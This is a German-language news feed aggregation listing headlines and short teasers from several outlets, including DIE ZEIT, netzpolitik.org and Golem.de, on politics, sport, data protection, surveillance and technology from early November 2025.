Der Versicherer Allianz Trade zählt 2025 schon 309 neu eingeführte Zölle. Die Experten erwarten ein rückläufiges Wachstum des Welthandels. Von der Neuausrichtung von Lieferketten und Transportwegen profitieren vor allem Standorte in zwei Weltgegenden.

Article link

Date of publish: Thu, 06 Nov 2025 15:58:32 GMT

„Ich zucke erst mal zusammen, wenn ich den Namen Leroy Sané dann wieder höre“

Julian Nagelsmann hat seinen Kader für die anstehenden Länderspiele bekanntgegeben. Mit zwei Personalien sorgt der Bundestrainer für faustdicke Überraschungen. Sportreporter Christian Beilfuß ordnet die Nominierungen ein.

Article link

Date of publish: Thu, 06 Nov 2025 15:56:06 GMT

Wo die Jugend ihr Land verteidigt – und das als Auszeichnung empfindet

Während junge Menschen in Deutschland sich mehrheitlich gegen die Wehrpflicht aussprechen, ist der Dienst an der Waffe in vielen nordeuropäischen Ländern ein umkämpftes Privileg. Eine Spurensuche zeigt, woran das liegt und was wir daraus lernen können.

Article link

Date of publish: Thu, 06 Nov 2025 15:48:33 GMT

Nachrichten: DIE ZEIT Newsfeed

Snap: US-Richter ordnet vollständige Finanzierung von Lebensmittelhilfen an

Die US-Regierung will im November lediglich Geld für etwa zwei Drittel der Lebensmittelhilfe bereitstellen. Ein Richter aus Rhode Island hält das für unzulässig.

Article link

Date of publish: Thu, 06 Nov 2025 22:53:26 -0000

Wintersport: Russland klagt gegen Ausschluss von Olympischen Winterspielen 2026

Als neutrale Athleten durften Russen bisher weiterhin bei Olympia antreten. Ein Wintersportverband verbot ihnen nun aber die Qualifikation. Russland will dagegen klagen.

Article link

Date of publish: Thu, 06 Nov 2025 22:44:08 -0000

Geschlechtsidentität: Supreme Court erlaubt Einschränkung der Geschlechtsauswahl im US-Pass

Donald Trump darf Maßnahmen umsetzen, die es trans und nicht binären Menschen verwehrt, ihr Geschlecht im Reisepass anzugeben. Das entschied der Oberste Gerichtshof.

Article link

Date of publish: Thu, 06 Nov 2025 22:26:47 -0000

Boeing 737-MAX: Boeing entgeht Strafverfahren in den USA

Sechs Jahre nach dem Absturz zweier 737-Max-Flugzeuge hat sich Boeing außergerichtlich mit der US-Regierung geeinigt. Der Konzern muss 1,1 Milliarden US-Dollar zahlen.

Article link

Date of publish: Thu, 06 Nov 2025 21:59:19 -0000

Europa League, 4. Spieltag: SC Freiburg dreht Spiel gegen OGC Nizza, Stuttgart gewinnt spät

In Nizza macht Freiburg einen großen Schritt in Richtung K.-o.-Runde und bleibt weiter ungeschlagen. Stuttgart tut sich schwer gegen Rotterdam. Die Spielberichte

Article link

Date of publish: Thu, 06 Nov 2025 20:32:21 -0000

Uganda: Internationales Strafgericht bestätigt Anklage gegen Joseph Kony

Seit 2005 wird der Milizenführer Joseph Kony per Haftbefehl gesucht, nach der Anklagebestätigung könnte ein Prozess starten. Doch dafür müsste Kony erst gefasst werden.

Article link

Date of publish: Thu, 06 Nov 2025 19:27:24 -0000

Agrardiesel-Subventionen: Steuerentlastungen für Agrardiesel werden wieder eingeführt

Die Ampelkoalition hatte die Steuervergünstigung für Agrardiesel gestrichen und damit Bauernproteste ausgelöst. Der Bundestag führt die Subventionen nun wieder ein.

Article link

Date of publish: Thu, 06 Nov 2025 19:19:54 -0000

Schweden: Betrieb am Flughafen Göteborg-Landvetter nach Drohnensichtung gestört

Am zweitgrößten Flughafen Schwedens ist der Flugverkehr nach einer Drohnensichtung eingestellt worden. Zwei Flüge aus Deutschland wurden nach Kopenhagen umgeleitet.

Article link

Date of publish: Thu, 06 Nov 2025 19:08:25 -0000

Carbon Capture and Storage: Bundestag macht Weg für unterirdische CO₂-Speicherung frei

Kohlendioxid-Emissionen sollen in Deutschland künftig unter dem Meeresboden verpresst werden dürfen. Der Bundestag hat die dafür notwendige Gesetzesänderung beschlossen.

Article link

Date of publish: Thu, 06 Nov 2025 18:47:47 -0000

"Was jetzt? – Die Woche": Wie teuer wird das Leben in Deutschland 2026?

Die Preise steigen – nicht nur durch die Inflation, sondern auch durch Regierungspolitik. Wie diese Entscheidungen unseren Alltag verteuern, in "Was jetzt? – Die Woche".

Article link

Date of publish: Thu, 06 Nov 2025 18:30:51 -0000

Krise in Georgien: Acht Oppositionelle in Georgien nach Umsturzvorwurf angeklagt

Georgiens Justiz hat unter anderem den früheren Präsidenten Saakaschwili wegen Sabotage und angeblicher Umsturzpläne angeklagt. Die Opposition kündigt Widerstand an.

Article link

Date of publish: Thu, 06 Nov 2025 18:04:24 -0000

Bundestag: Linkenabgeordnete erneut nicht in Geheimdienstgremium gewählt

Auch im zweiten Versuch fehlen der Linkenkandidatin Stimmen für einen Sitz im Geheimdienstausschuss des Bundestags. Ihr Fraktionschef wirft der Union Machtspiele vor.

Article link

Date of publish: Thu, 06 Nov 2025 17:44:04 -0000

Europa League: Jetzt live: OGC Nizza – SC Freiburg

Vierter Spieltag in der Europa League: Die Männer aus dem Breisgau treten an der Cote d'Azur in Nizza an. Alle Spiele im Liveticker

Article link

Date of publish: Thu, 06 Nov 2025 17:42:40 -0000

Frauen-Bundesliga: 100 Millionen Euro und fast so viele Probleme

Damit die Frauen-Bundesliga nicht endgültig abgehängt wird, wollen die Klubs und der DFB investieren. Trotzdem könnten bald noch mehr Topspielerinnen ins Ausland gehen.

Article link

Date of publish: Thu, 06 Nov 2025 17:27:02 -0000

Sotschi: AfD-Politiker reisen zu Brics-Konferenz nach Russland

Mehrere AfD-Politiker wollen an einer Konferenz der Brics-plus-Staaten in Sotschi teilnehmen. Ein zunächst geplantes Treffen mit Dmitri Medwedew findet doch nicht statt.

Article link

Date of publish: Thu, 06 Nov 2025 17:05:38 -0000

netzpolitik.org

Digitaler Euro: Während das Parlament streitet, geht die Entwicklung weiter

Navarrete an einem Rednerpult, im Hintergrund Flaggen von EU-Ländern
Navarrete hätte den digitalen Euro am liebsten nur als Offline-Variante. – Alle Rechte vorbehalten European Union 2025 – Source : EP, Genevieve Engel
Das Europäische Parlament ist sich beim Digitalen Euro nicht einig. Der zuständige Berichterstatter will zunächst eine reine Offline-Lösung, progressive Fraktionen sehen das ganz anders. Währenddessen treibt die Zentralbank die Umsetzung weiter voran.

Article link

Date of publish: Thu, 06 Nov 2025 16:56:29 +0000

Digitaler Omnibus: EU-Kommission strebt offenbar Kahlschlag beim Datenschutz an

Eine Axt mit Holzstiel steckt in einem Baum
Reform mit der Axt: Die EU-Kommission plant anscheinend massive Einschnitte beim Datenschutz. – Gemeinfrei-ähnlich freigegeben durch unsplash.com David Popkov
Freifahrtschein für KI-Training, weniger Schutz für pseudonymisierte und sensible Daten, Beschneidung von Betroffenenrechten: Es verdichten sich die Hinweise, dass die EU-Kommission einen Frontalangriff auf die DSGVO plant. Auch die Bundesregierung fordert dahingehend Einschnitte, wie ein Dokument belegt, das wir veröffentlichen.

Article link

Date of publish: Thu, 06 Nov 2025 14:44:34 +0000

Elektronische Patientenakte: Bundestag beschließt doppelte Rolle rückwärts

Der vitruvianische Mensch von Leonardo da Vinci als Röntgenbild
Wie viele ihrer Gesundheitsdaten müssen Versicherte preisgeben? – Alle Rechte vorbehalten IMAGO / Design Pics
Der Bundestag hat mit den Stimmen von Schwarz-Rot zwei Änderungen bei der elektronischen Patientenakte beschlossen. Das Echo darüber fällt geteilt aus: Einerseits wird die Rückkehr zu mehr Datenhoheit vorsichtig begrüßt, andererseits werden gesenkte Sicherheitsstandards kritisiert.

Article link

Date of publish: Thu, 06 Nov 2025 14:35:04 +0000

Einigung rückt näher: EU-Rat könnte verpflichtende Chatkontrolle verwerfen

Smartphone-Bildschirm mit den Logos von Signal und WhatsApp und einem Finger, der draufdrücken will.
Laut dem neuen dänischen Vorschlag sollen die Anbieter selbst entscheiden können, ob sie die Kommunikation scannen. – Alle Rechte vorbehalten https://social.bund.de/@bfdi/115497859112865101
Die dänische Ratspräsidentschaft sieht genügend Unterstützung für einen Kompromissvorschlag bei der Chatkontrolle. Sollte sich der Rat darauf einigen, wäre die verpflichtende Chatkontrolle vorerst vom Tisch – aber die freiwillige Chatkontrolle soll zementiert werden.

Article link

Date of publish: Thu, 06 Nov 2025 13:28:05 +0000

Extra dünn: Generative KI verzerrt unser Körperbild

Das illustrierte Bild zeigt eine dünne Frau, wie sie in einem lila Abendkleid posiert.
Extra schlank! Sieht so der KI-Körper aus? – Alle Rechte vorbehalten IMAGO / Zoonar
KI-Generatoren produzieren nicht nur Bilder und Videos, sondern reproduzieren auch Diskriminierung. Eine Wissenschaftlerin der Universität Cambridge fand heraus, dass KI Menschen mit großen Körpern häufiger einen negativen Gesichtsausdruck verleiht und teilweise Probleme bei deren anatomischer Darstellung hat.

Article link

Date of publish: Thu, 06 Nov 2025 06:56:32 +0000

Drahtbericht: Deutsche Diplomaten fordern undiplomatisch Chatkontrolle

Eingangstor mit Bundeswapppen und Flaggen
Ständige Vertretung Deutschlands in Brüssel. – Alle Rechte vorbehalten Auswärtiges Amt
Die deutsche Vertretung in Brüssel beschwert sich über den Widerstand gegen die Chatkontrolle. Das geht aus einem internen Drahtbericht hervor, den wir veröffentlichen. Die Diplomaten wollen, dass Deutschland der Chatkontrolle zustimmt - und kritisieren sogar die Justizministerin.

Article link

Date of publish: Wed, 05 Nov 2025 17:44:14 +0000

Surveillance under Surveillance: Weltkarte der Videoüberwachung gerettet

Karte mit eingezeichneten Kameras am Bahnhof Hamburg-Dammtor
So viele Kameras überwachen rund um den Bahnhof Hamburg-Dammtor. OSM
Das Projekt "Surveillance under Surveillance" visualisiert Videoüberwachung auf einer Weltkarte. Kurzfristig stand der Weiterbetrieb auf der Kippe, jetzt geht es unter dem Dach des Chaos Computer Club Hamburg weiter.

Article link

Date of publish: Wed, 05 Nov 2025 15:57:26 +0000

Dänischer Vorschlag: Der Kampf um die Chatkontrolle ist noch nicht vorbei

Mann im Anzug spricht in Mikrofon.
Dänischer Justizminister Peter Hummelgaard. CC-BY-NC-ND 4.0 Dänische Ratspräsidentschaft
Internet-Dienste sollen nicht zur Chatkontrolle verpflichtet werden, aber mit Chatkontrolle freiwillig das Risiko für Straftaten mindern. Das schlägt die dänische Ratspräsidentschaft in einem Debattenpapier vor. Die EU-Kommission soll später prüfen, ob das reicht - oder nochmal ein Chatkontrolle-Gesetz vorschlagen.

Article link

Date of publish: Tue, 04 Nov 2025 16:54:44 +0000

Interaktive Webseite: Wie autoritäre Tech-Netzwerke die europäische Souveränität gefährden

Das Bild ist ein Netzwerkdiagramm, das die Beziehungen zwischen verschiedenen Persönlichkeiten, Unternehmen und Fonds in der Technologie- und Politikwelt darstellt. Auf dem Diagramm sind Namen und Logos von Personen wie Peter Thiel, Elon Musk, Marc Andreessen, Donald Trump Jr. und Unternehmen wie Oculus, SpaceX, Palantir, Anduril und verschiedene Risikokapitalfonds (a16z, Founders Fund usw.) zu sehen. Linien verbinden die verschiedenen Elemente und zeigen so Verbindungen oder Beziehungen zwischen ihnen an. Jede Person und jedes Unternehmen hat eine kurze beschreibende Unterschrift.
Das autoritäre Tech-Netzwerk. (Screenshot aus der Studie) CC-BY-NC-ND 4.0 authoritarian-stack.info
In den USA übernehmen private Plattformen und Konzerne immer mehr staatliche Funktionen. Wissenschaftler:innen machen dieses System nun sichtbar: Auf einer interaktiven Webseite zeigen sie den „Authoritarian Stack“ und wie dieser zunehmend auch nach Europa greift.

Article link

Date of publish: Tue, 04 Nov 2025 13:33:59 +0000

Databroker Files: All you need to know about how adtech data exposes the EU to espionage

A figure wearing a floppy hat, with a red pin hidden under their coat, represents a data broker. A mobile phone displaying ads. The stars of the EU flag. Fog.
Threat to privacy and national security. – Figure: Pixabay; Fog: Vecteezy; Montage: netzpolitik.org
Our latest investigation has shaken up Brussels by revealing that commercial datasets containing 278 million locations can be used to spy on the EU and NATO. The European Commission has expressed its concern, Members of Parliament are calling for action. One thing is clear: ad tracking and data brokers threaten Europe's security.

Article link

Date of publish: Tue, 04 Nov 2025 04:00:54 +0000

Databroker Files: Targeting the EU

The EU Commission building. Two people in business attire. A crosshair is superimposed over one person's face.
Hundreds of potentially sensitive EU employees can be targeted with openly traded cell phone location data. – Building: IMAGO/Zoonar; Figures: Pixabay/Mohammed Hasan; Fog: Vecteezy, Montage: netzpolitik.org
Precise locations and revealing movement patterns: the mobile phone location data of millions of people in the EU is up for sale. Collected supposedly only for advertising purposes, this data can also be used for espionage. European data protection is failing – even top EU officials in Brussels are affected. The EU Commission says: 'We are concerned."

Article link

Date of publish: Tue, 04 Nov 2025 04:00:18 +0000

Databroker Files: Das Wichtigste zur Spionage-Gefahr durch Handy-Standortdaten in der EU

Eine Gestalt mit Schlapphut, roter Stecknadel unterm Mantel stellt einen Databroker dar. Ein Handy mit Werbeanzeigen. Die Sterne der EU-Flagge. Nebel.
Gefahr für Privatsphäre und nationale Sicherheit (Symbolbild) – Gestalt: Pixabay; Nebel: Vecteezy; Montage: netzpolitik.org
Unsere neueste Recherche zu 278 Millionen Standortdaten, mit denen sich EU und NATO ausspionieren lassen, schlägt in Brüssel hohe Wellen. Die EU-Kommission zeigt sich besorgt, EU-Abgeordnete fordern Konsequenzen. Allen ist klar: Werbe-Tracking und Datenhandel gefährden die Sicherheit Europas.

Article link

Date of publish: Tue, 04 Nov 2025 04:00:06 +0000

Databroker Files: Datenhändler verkaufen metergenaue Standortdaten von EU-Personal

Das Gebäude der EU-Kommission. Zwei Personen im Business-Outfit. Über dem Gesicht einer Person liegt ein Fadenkreuz.
Mit offen gehandelten Handy-Standortdaten lassen sich Hunderte potenziell sensible Angestellte der EU ins Visier nehmen (Symbolbild) – Gebäude: IMAGO/Zoonar; Figuren: Pixabay/Mohammed Hasan; Nebel: Vecteezy, Montage: netzpolitik.org
Exakte Ortungen, verräterische Bewegungsmuster: Die Handy-Standortdaten von Millionen Menschen in der EU stehen zum Verkauf. Angeblich nur zu Werbezwecken erhoben, lassen sich die Daten auch für Spionage nutzen. Der europäische Datenschutz versagt, selbst EU-Spitzenpersonal in Brüssel ist betroffen. Die EU-Kommission sagt: "Wir sind besorgt."

Article link

Date of publish: Tue, 04 Nov 2025 04:00:05 +0000

Trugbild: Zündeln für Reichweite

Das Spiel mit dem Feuer. – Public Domain Public Domain Vincent Först mit ChatGPT
Der digitale Debattenzirkus polarisiert vor sich hin. Geht es wirklich um Meinungen oder nur noch ums Geschäft?

Article link

Date of publish: Sun, 02 Nov 2025 08:00:48 +0000

KW 44: Die Woche, in der die Bundesregierung ihre KI-Agenda hyped

– Fraktal, generiert mit MandelBrowser von Tomasz Śmigielski
Die 44. Kalenderwoche geht zu Ende. Wir haben 16 neue Texte mit insgesamt 111.433 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 01 Nov 2025 07:44:38 +0000

Umfrage zu Rechenzentren: Die Mehrheit folgt dem Hype nicht

Schornsteine vor bewölktem Himmel aus denen Rauchwolken quillen
Fossile Energien erfahren eine Renaissance – dank ressourcenhungriger KI. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Janusz Walczak
Die Bundesregierung will Deutschland zur "KI-Nation" machen, die EU verfolgt eine "AI-First"-Mentalität. Eine Umfrage in mehreren europäischen Ländern zeigt nun, dass die Mehrheit der Befragten diesen Hype nicht mitträgt. Ihr bereitet vor allem der wachsende Strom- und Wasserverbrauch Sorge. Und sie wünscht sich eine strengere Regulierung.

Article link

Date of publish: Sat, 01 Nov 2025 07:40:59 +0000

Transparenzbericht 3. Quartal 2025: Unsere Einnahmen und Ausgaben und verschiedene Hüte

Das Gemälde "Schwestern" von Kasimir Malewitsch, „Schwestern“ aus dem Jahr 1930 zeigt zwei Personen im weißen Kleid mit blauen Hüten.
Hüte. – Public Domain Kasimir Malewitsch, „Schwestern“, 1930
Im dritten Quartal trugen wir quietschrote Bauhelme und besichtigten eine Ruine. Und wir zogen Delegationshüte fürs Pokern auf. Nun hoffen wir, dass wir im nächsten Transparenzbericht "Hut ab!" rufen können. Dafür braucht es eure Unterstützung.

Article link

Date of publish: Fri, 31 Oct 2025 16:54:59 +0000

Rasterfahndung: Daten von 153 Millionen Fluggästen landen 2024 beim BKA

Zwei Hände halten eine Bordkarte von Finnair. Im Hintergrund ist ein schwarzer Koffer.
Wer fliegt wohin, wann und mit wem? All das leiten die Fluggesellschaften an das BKA weiter. – Alle Rechte vorbehalten IMAGO / Zoonar
Das Bundeskriminalamt hat vergangenes Jahr fast 548 Millionen Fluggastdaten erhalten und gerastert. Das geht aus einer Antwort der Bundesregierung hervor. Mittlerweile landen 90 Prozent aller Passagiere in Deutschland in Datenbanken bei der Polizei.

Article link

Date of publish: Fri, 31 Oct 2025 16:36:42 +0000

Neue irische Datenschutzbeauftragte: Menschenrechtsorganisation reicht Beschwerde bei EU-Kommission ein

Bild des Gebäudes der EU-Kommission. Menschen stehen auf einem regenbogenfarbenden Fußgängerüberweg vor dem Gebäude.
Die EU-Kommission sei nicht zuständig, sagt die Kommission. – Alle Rechte vorbehalten IMAGO / Michael Kneffel
Der Streit um die Berufung der ehemaligen Meta-Angestellten Niamh Sweeney zur irischen Datenschutzbeauftragten erreicht Brüssel. Doch auch nach einer formalen Beschwerde des Irish Council for Civil Liberties will die EU-Kommission offenbar nicht in das Verfahren eingreifen.

Article link

Date of publish: Fri, 31 Oct 2025 13:57:13 +0000

AI Act: Wird sich die KI-Regulierung verzögern?

Mit dem Slogan „Stop the clock“ fordert die Industrie, Regeln der KI-Verordnung zu verzögern. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Malvestida
Eigentlich sollen zentrale Teile der europäischen KI-Verordnung im August 2026 in Kraft treten. Weil aber bestimmte Standards noch fehlen, fordern Unternehmen, die Frist nach hinten zu verschieben. Organisationen wie European Digital Rights (EDRi) sehen darin einen großen Fehler, doch die Aufschiebung scheint immer wahrscheinlicher.

Article link

Date of publish: Fri, 31 Oct 2025 12:35:34 +0000

Sorge vor US-Sanktionen: Internationaler Strafgerichtshof kickt Microsoft aus seiner Verwaltung

Karim Khan am Rednerpult vor verpixeltem Hintergrund
Karim Khan, Chefankläger beim Internationalen Strafgerichtshof, will sich mit seiner Organisation von Microsoft unabhängig machen. – Alle Rechte vorbehalten Karim Khan: IMAGO/UPI Photo; Bearbeitung: netzpolitik.org
Der Internationale Gerichtshof will sich von Microsoft unabhängig machen und schwenkt auf openDesk um, die Open-Source-Bürosoftware des Zentrums für Digitale Souveränität. Die Bundesregierung könnte sich daran ein Beispiel nehmen. Denn während openDesk bei europäischen Nachbarn gefragt ist, fremdelt die Bundesverwaltung noch immer damit.

Article link

Date of publish: Fri, 31 Oct 2025 11:07:06 +0000

Etappensieg: Dänemark nimmt Abstand von verpflichtender Chatkontrolle

Mann vor Leinwand, Smartphone nimmt ihn auf.
Dänischer Justizminister Peter Hummelgaard. CC-BY-NC-ND 4.0 Dänische Ratspräsidentschaft
Die dänische Ratspräsidentschaft schlägt vor, die Chatkontrolle freiwillig zu erlauben, statt sie verpflichtend zu machen. Die EU-Staaten haben diesen Vorschlag bereits einmal abgelehnt, ob sie jetzt zustimmen, ist offen. Viele Akteure lehnen eine freiwillige Chatkontrolle ab - auch die EU-Kommission.

Article link

Date of publish: Fri, 31 Oct 2025 10:40:55 +0000

Digital Fairness Act: Große Wünsche für mehr Verbraucherschutz im Netz

Ein stilisiertes Megaphon und ein Kopf, dazwischen ein Kabelgewirr.
Manipulation im Internet ist weit verbreitet – und ein einträgliches Geschäft. – Alle Rechte vorbehalten IMAGO / Zoonar
Manipulatives Design im Netz ist seit langer Zeit ein Problem. Mit dem geplanten Digital Fairness Act will die EU-Kommission gegen solche Tricks vorgehen. Verbraucherschützer:innen, Forscher:innen und Regulierungsbehörden fordern einen grundlegenden Ansatz.

Article link

Date of publish: Thu, 30 Oct 2025 10:47:48 +0000

Zivilgesellschaft: Kritik an Debatte um „Missbrauch von Sozialleistungen“

Bärbel Bas sitzt im Bundestag und guckt grimmig.
Arbeitsministerin und SPD-Co-Chefin Bas will härter gegen „Missbrauch von Sozialleistungen“ vorgehen – Alle Rechte vorbehalten IMAGO / dts Nachrichtenagentur
Um „organisierten Leistungsmissbrauch“ im Sozialbereich zu verhindern, will Arbeitsministerin Bärbel Bas den Datenaustausch zwischen Polizei, Ordnungsämtern und Jobcenter fördern und das Strafrecht verschärfen. Sozialverbände und Organisationen von Betroffenen warnen vor verheerenden Folgen.

Article link

Date of publish: Wed, 29 Oct 2025 16:18:08 +0000

In Echtzeit: US-Abschiebebehörde ICE baut Überwachungsarsenal weiter aus

Smartphone wird in den Nachthimmel gehalten. Auf dem Bildschirm kann man den Livestream eines Protests erkennen.
Livestream von Anti-ICE Protest. Ab jetzt besser nicht mehr? – Alle Rechte vorbehalten IMAGO / Anadolu Agency
Die US-amerikanische Auswanderungsbehörde ICE kauft immer mehr Überwachungssoftware. Jetzt arbeitet ICE mit einem Unternehmen zusammen, mit dessen Software das Militär soziale Medien in Echtzeit observiert.

Article link

Date of publish: Wed, 29 Oct 2025 13:59:05 +0000

Golem.de

Scharfe Kritik an Pistorius: Milliardenprojekt Digitalfunk funktioniert im Leopard nicht

Der Verteidigungsminister kommt wegen der seit Jahren misslingenden Digitalisierung des Bundeswehrfunks unter Druck. Nun sollen es Consultants für rund 160 Millionen Euro lösen. (Funkgerät, Politik)

Article link

Date of publish: Fri, 07 Nov 2025 00:01:01 +0100

Rockstar Games: GTA 6 erneut verschoben

Lucia und Jason müssen sich weiter gedulden: Rockstar hat den Start von GTA 6 auf November 2026 verschoben - sehr zum Ärger vieler Fans. (GTA 6, Take-Two)

Article link

Date of publish: Thu, 06 Nov 2025 22:41:02 +0100

Petition: Palantir des Faschisten Thiel "kein Partner" Deutschlands

Vor dem Stuttgarter Landtag hat Sebastian Müller vom CCC die Petition gegen Palantir vorgestellt. Die USA würden zum Systemrivalen. (Palantir, Datenschutz)

Article link

Date of publish: Thu, 06 Nov 2025 22:37:01 +0100

Jan Marsalek: Ex-Wirecard-Vorstand in Operation Chargeback unter Verdacht

Marsalek und frühere Kollegen von Wirecard gehören zu den Beschuldigten. Laut BKA waren vier große deutsche Zahlungsdienstleister von innen kompromittiert. (Wirecard, Security)

Article link

Date of publish: Thu, 06 Nov 2025 21:09:02 +0100

Tales from '85: Erste Eindrücke vom Stranger-Things-Ableger

Die fünfte Staffel von Stranger Things startet in wenigen Wochen. Netflix präsentiert derweil einen ersten Eindruck vom Serien-Spin-off. (Netflix, Science-Fiction)

Article link

Date of publish: Thu, 06 Nov 2025 18:22:02 +0100

E-Auto: Renault bringt elektrischen Twingo für unter 20.000 Euro

Renault hat den Twingo E-Tech vorgestellt, der unter 20.000 Euro angeboten werden soll. Für Fernfahrten ist die Reichweite nicht optimal. (Renault, Elektroauto)

Article link

Date of publish: Thu, 06 Nov 2025 18:15:02 +0100

Anzeige: Smarte WLAN-Steckdose mit Alexa zum Sparpreis bei Amazon

Amazon hat eine kompakte WLAN-Steckdose im Angebot, die per App und Sprachbefehl gesteuert wird und den Stromverbrauch misst. (Smart Home, Google Home)

Article link

Date of publish: Thu, 06 Nov 2025 17:40:02 +0100

Von Kriminellen genutzter Messenger: Weitere Verhaftungen wegen Anom-Daten

Die australische Polizei führt auch nach vier Jahren immer noch Verhaftungen auf Grundlage des Anom-Messengers durch. (Cybercrime, Instant Messenger)

Article link

Date of publish: Thu, 06 Nov 2025 17:05:02 +0100

Geoengineering: Elon Musk und der additive bias

Mit Satelliten die Sonne verdunkeln und die Erderwärmung stoppen. Eine solche Technik birgt Gefahren, die Denkweise dahinter auch. Ein IMHO von Mario Petzold (Elon Musk, KI)

Article link

Date of publish: Thu, 06 Nov 2025 16:50:02 +0100

Anzeige: Redtiger-4K-Dashcam jetzt 30 Prozent günstiger zu haben

Die Redtiger-4K-Dashcam kommt mit dualer Kamera, GPS und praktischem Touchscreen: bei Amazon kurzzeitig wieder mit starkem Rabatt. (GPS, Ultra-HD)

Article link

Date of publish: Thu, 06 Nov 2025 16:35:02 +0100

Predator Badlands: Aus dem Alien-Jäger wird ein Familienmensch

Was 1987 als harter Actionfilm begonnen hat, ist 2025 beinahe familientauglich. Predator: Badlands macht den Predator zum menschelnden Helden. Eine Rezension von Daniel Pook (Filme & Serien, Film)

Article link

Date of publish: Thu, 06 Nov 2025 16:30:07 +0100

Inter.link: Vodafone Deutschland beendet Public Peering

Vodafone wird bis Jahresende von den bestehenden Internetknoten auf Inter.link aus Berlin umstellen. Private Peering, vor allem mit Hyperscalern, macht Vodafone weiter. (Vodafone, Kabelnetz)

Article link

Date of publish: Thu, 06 Nov 2025 16:20:02 +0100

Anzeige: PCIe-5-SSD mit 1 TByte für unter 100 Euro

Die Lexar Ares Pro mit 1 TByte ist bei Amazon wieder für unter 100 Euro erhältlich. Günstiger war die M.2-SSD noch nie. (Solid State Drive, Speichermedien)

Article link

Date of publish: Thu, 06 Nov 2025 16:07:01 +0100

Playstation: So ist mobiles Spielestreaming super!

Dank Firmware-Update wird PS Portal zum vollwertigen Handheld: Endlich lassen sich PS5-Spiele aus der Cloud streamen. Wir haben es ausprobiert. Ein Hands-on von Peter Steinlechner (Spielestreaming, DSL)

Article link

Date of publish: Thu, 06 Nov 2025 15:36:01 +0100

Anzeige: Macbook, iPhone, iPad - Black-Friday-Deals bei Back Market

Der November ist der Monat der Schnäppchen. Bei Back Market sind refurbished Produkte von Apple wie iPhone, iPad und Macbook stark reduziert. (Black Friday, Apple)

Article link

Date of publish: Thu, 06 Nov 2025 15:21:01 +0100

Animationsfilm: Sony und Netflix arbeiten an Sequel von KPop Demon Hunters

Der Animationsfilm gehört zu den meistgesehenen Netflix-Produktionen des Jahres 2025. Sony und Netflix planen eine Fortsetzung für 2029. (Filme & Serien, Sony)

Article link

Date of publish: Thu, 06 Nov 2025 14:34:02 +0100

Anzeige: Saugroboter mit Wischfunktion 250 Euro günstiger bei Amazon

Amazon hat einen Saugroboter mit Wischfunktion und Kantenreinigung im Angebot, der dank Multifunktionsdock kaum Wartungsaufwand verursacht. (Saugroboter, Technik/Hardware)

Article link

Date of publish: Thu, 06 Nov 2025 14:30:02 +0100

i-Kfz-App: Digitaler Fahrzeugschein gestartet

Die Suche nach dem Fahrzeugschein soll der Vergangenheit angehören. Das Dokument lässt sich in eine App des KBA hochladen. (Digitalisierung, QR-Code)

Article link

Date of publish: Thu, 06 Nov 2025 14:20:02 +0100

Fokus auf Cloud und Software: IBM kündigt weitere Entlassungen an

Für das vierte Quartal kündigt IBM Entlassungen an, um das Unternehmen und die Belegschaft auf neue Wachstumsmärkte auszurichten. (IBM, KI)

Article link

Date of publish: Thu, 06 Nov 2025 14:05:01 +0100

Laut Gericht unschuldig: FBI löscht Festplatte mit angeblichen 3.400 Bitcoin

Die verlorenen Bitcoin haben heute einen Wert von über 300 Millionen Euro. Ein Berufungsgericht sieht die Schuld nicht beim FBI. (Rechtsstreitigkeiten, Speichermedien)

Article link

Date of publish: Thu, 06 Nov 2025 13:50:01 +0100

(g+) Krisenfest kommunizieren - Teil 2: Satellitenmessenger, mobile Hotspots und portable Antennen

Funkgeräte sind praktisch, haben aber nur eine kurze Reichweite. Für größere Entfernungen braucht es Satellitenkommunikation - ein Überblick über nützliche Geräte. Ein Ratgebertext von Fabian Deitelhoff (Satelliten, WLAN-Hotspot)

Article link

Date of publish: Thu, 06 Nov 2025 13:30:02 +0100

Anzeige: Apple Magic Keyboard mit Touch ID jetzt 23 Prozent günstiger

Apple-Deals sind rar und schnell vergriffen. Das Magic Keyboard mit Touch ID und Ziffernblock gibt es jetzt deutlich günstiger. (Apple, Eingabegerät)

Article link

Date of publish: Thu, 06 Nov 2025 13:26:02 +0100

Tesla-Multipass gestartet: Die Schlüsselkarte wird zur Ladekarte

Tesla-Fahrer können über ihre App andere Ladenetzbetreiber nutzen. Das umfasst 1.000 Ladenetzwerke in Europa. (Tesla, Elektroauto)

Article link

Date of publish: Thu, 06 Nov 2025 13:15:02 +0100

Thoriumreaktor: Erstmals Uran direkt in Flüssigsalzreaktor erbrütet

Noch handelt es sich um einen kleinen Forschungsreaktor, aber anders als spaltbares Uran ist Thorium bestens verfügbar. (Atomkraft, Strom)

Article link

Date of publish: Thu, 06 Nov 2025 13:00:02 +0100

Anzeige: Philips senkt Preis für OneBlade-Rasierer um 35 Euro

Dieser Philips OneBlade trimmt, rasiert und stylt Gesicht und Körper, kommt mit Präzisionskamm, zwei Aufsätzen und praktischer Ladestation. (Technik/Hardware, Philips)

Article link

Date of publish: Thu, 06 Nov 2025 12:57:01 +0100

MS 365: Microsoft entschuldigt sich für aggressive Office-Angebote

Mit manipulativen Benutzeroberflächen und ungewollten Voreinstellungen hat Microsoft versucht, Kunden in ein teureres Office-365-Abo zu drängen. (Microsoft 365, Microsoft)

Article link

Date of publish: Thu, 06 Nov 2025 12:45:05 +0100

Night of the Witch: Drehbuch von Stan Lee und Lloyd Kaufman wird verfilmt

Vor mehr als 50 Jahren haben Marvel-Autor Stan Lee und Toxic-Avenger-Schöpfer Lloyd Kaufman ein Drehbuch geschrieben, das endlich verfilmt wird. (Marvel, Film)

Article link

Date of publish: Thu, 06 Nov 2025 12:35:01 +0100

Milliarden Passwörter: HaveIBeenPwned erhält größtes Daten-Update aller Zeiten

Sicherheitsforscher haben E-Mail-Adressen und Passwörter aus Credential-Stuffing-Listen zusammengetragen - für HIBP der bisher größte Datensatz. (Datenleck, Security)

Article link

Date of publish: Thu, 06 Nov 2025 12:30:02 +0100

Daniel Vavra: KCD2-Entwickler kritisiert The Outer Worlds 2

Ungewöhnlich offene Kritik: Kingdom-Come-Deliverance-2-Macher Daniel Vávra hat The Outer Worlds 2 für mangelnde Innovation gerügt. (Kingdom Come Deliverance, Rollenspiel)

Article link

Date of publish: Thu, 06 Nov 2025 12:15:02 +0100

